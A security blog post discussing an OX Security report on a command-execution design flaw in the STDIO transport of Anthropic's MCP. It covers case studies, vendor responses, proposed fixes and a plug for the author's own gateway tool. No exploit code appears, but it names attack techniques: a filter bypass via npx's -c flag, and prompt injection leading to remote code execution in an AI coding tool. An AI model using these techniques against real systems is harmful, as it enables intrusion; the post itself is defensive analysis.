Ox Security Report: Anthropic MCP is Execute First, Validate Never

OX Security published a report today that lands directly in the growing storm about Anthropic’s risk management practices. To put it bluntly, a systemic vulnerability sits at the core of Anthropic’s Model Context Protocol (MCP).

The finding is simple. MCP’s STDIO transport accepts arbitrary command strings and passes them directly to subprocess execution.

Yup.

No validation.
No sanitization.
No sandboxing.

It gets worse. The command runs even when the MCP server fails to start. The process executes first, then the MCP handshake tries to validate it as a legitimate server, then the handshake fails, then the error gets caught. But the payload already ran. Execute first, validate second. Fire, ready, aim fails any threat model.

Every developer who builds on Anthropic’s MCP inherits the exposure because it is found across all ten official MCP language SDKs: Python, TypeScript, Java, Kotlin, C#, Go, Ruby, Swift, PHP, and Rust.

OX POC Numbers

The OX Research team report shows they executed commands on six production platforms of paying customers. They took over thousands of public servers spanning more than 200 popular open-source GitHub projects. They uploaded a proof-of-concept malicious MCP server to 9 of 11 major MCP marketplaces.

Not a single marketplace caught it.

The case studies are where it gets really interesting.

LangFlow: 915 publicly accessible instances on Shodan, unauthenticated session tokens, full server takeover and data exfiltration without ever logging in.
Letta AI: authenticated users could substitute a valid STDIO payload via man-in-the-middle, achieving arbitrary command execution on production servers.
Windsurf: prompt injection to local RCE with zero clicks, assigned CVE-2026-30615.
Flowise: the most important case. Flowise actually did what Anthropic says developers should do. They implemented input filtering. Specific commands only. Special characters stripped. And then? OX bypassed it in a single step using npx’s -c flag. When the architecture permits arbitrary subprocess execution, application-layer filtering is a wet paper bag. The “developer responsibility” defense just lost a whole lot of trust.

The obvious objection to LangFlow is that 915 instances of a tool designed for local deployment ended up on the public internet, and that’s a configuration failure not a protocol failure. Ok, fine. That is why the Flowise case is up there too. Flowise did the right thing. They implemented filtering in the intended local context. It didn’t work. The design flaw defeated the shift of responsibility.

We can apply this generally to the world of MCP and think in big, big terms. Anthropic’s MCP Python SDK alone accounts for 73 million downloads. The third-party projects that depend on it push the aggregate higher: 57 million for LiteLLM, 22 million for FastMCP. Over 32,000 dependent repositories. Not all of those are Anthropic’s code, but all of them inherit Anthropic’s architectural decision.

OX confirmed 7,374 public servers vulnerable on Shodan, of more than 200,000 estimated exposed. That’s a meaningful number for a company gathering headlines about a $100 million vulnpocalypse in OTHER people’s software.

Anthropic Response

OX contacted Anthropic on January 7, 2026 and got this statement:

This is an explicit part of how stdio MCP servers work and we believe that this design does represent a secure default.

LangChain’s response:

It is the responsibility of the application author to validate and sanitize inputs from untrusted sources.

FastMCP’s response:

We don’t consider this a vulnerability. stdio transport spawns a subprocess by design, per the MCP specification.

Google’s Gemini-CLI:

Known issue, no CVE, no fix planned near-term.

Cursor:

By design. User must click accept on mcp.json edit.

Clearly, when five independent organizations float the same answer, threat modeling is not experiencing deep or diverse thought. I’m having flashbacks to the old Telnet is everywhere days. Apparently MCP comes with an industry-wide expectation for architectural insecurity to float away onto someone else.

At least we can see that, after OX’s initial report, Anthropic quietly updated its SECURITY.md to recommend that MCP adapters and specifically STDIO ones “should be used with caution.”

Yellow wet-floor-style caution sign in a server room reading "CAUTION: SUBPROCESS SPAWNING"

A documentation change. Not a code change. The vulnerability is there for you to step on like a land mine under a treadmill. The responsibility is not where it should be. The question is why.

Contrast to Glasswing

Anthropic just launched Project Glasswing, a $100 million cybersecurity initiative using its unreleased Mythos model to find zero-day vulnerabilities in everyone else’s software. AWS, Apple, Google, Microsoft, and CrowdStrike are officially participating and promoting their participation.

Anthropic is positioning itself as the entity that will secure the software ecosystem. Why would you trust a company to find vulnerabilities in your code when it classifies arbitrary command execution in its own protocol as expected behavior?

The conflict is not that Glasswing exists while MCP is insecure. The conflict is that Glasswing’s value proposition requires exactly the kind of belt-and-suspenders “secure by default” thinking that Anthropic refuses to apply at all with MCP. Can they really sell everyone on the standard they refuse to meet?

OX proposed four specific fixes that would have propagated protection instantly to every downstream library and project:

Manifest-only execution to replace arbitrary command strings
Command allowlisting to block high-risk binaries by default
A mandatory dangerous-mode opt-in flag for any STDIO configuration using dynamic arguments
Marketplace verification standards requiring security manifests signed by verified developer identity

Anthropic declined all four. The company is spending $100 million to find other people’s decades-old bugs with Mythos. Fixing the architectural flaw in its own protocol from 2024 apparently does not qualify.

OX calls Anthropic’s approach “Fault-Diversion”: pushing the burden of complex security sanitization onto downstream developers. Their framing is generous. This ain’t my first rodeo, so I recognize this pattern. A company understands the problem. Has the resources to fix it. Receives concrete proposed solutions. Declines all of them. Updates a document. Then shifts responsibility to implementers. Which obscures who created it.

Lay My Body to Rest On the Hill of Secure by Default

The proposed remediation list from OX reads like a requirements document for Wirken, the secure agent gateway I built to address exactly this class of problem. CISOs often know “this is not how things should be done”, but they lack a pivot. They really need help pointing at something that proves it can be done differently.

Attack Surface	MCP default	MCP behind Wirken
Command execution	Arbitrary strings passed to subprocess, no filtering	Docker/gVisor/Wasm sandbox, graduated permissions, shell exec requires approval, approvals expire after 30 days by default
Audit trail	None	Append-only hash-chained log, SHA-256 tamper detection, SIEM forwarding to Datadog/Splunk/webhook in real time
Identity verification	No identity or signing in the STDIO transport specification	Each channel runs as isolated process with its own Ed25519 identity over Unix domain sockets via Cap’n Proto
Credential storage	Exposed (primary exfiltration target in OX findings)	Encrypted at rest with XChaCha20-Poly1305, keyed from OS keychain

Secure-by-default agent execution is NOT aspirational. It should be the baseline. That’s why I open-sourced it so anyone can pull and play with it. When a CISO asks “what ships today” for MCP security, it’s right there. Single static binary. The architectural choices OX is asking Anthropic to make are choices that already have been made available via Wirken.

Credit to OX for doing the work and setting the record straight. Their full report is available here: The Mother of All AI Supply Chains.

flyingpenguin

Ox Security Report: Anthropic MCP is Execute First, Validate Never

Leave a Reply

a blog about the poetry of information security, since 1995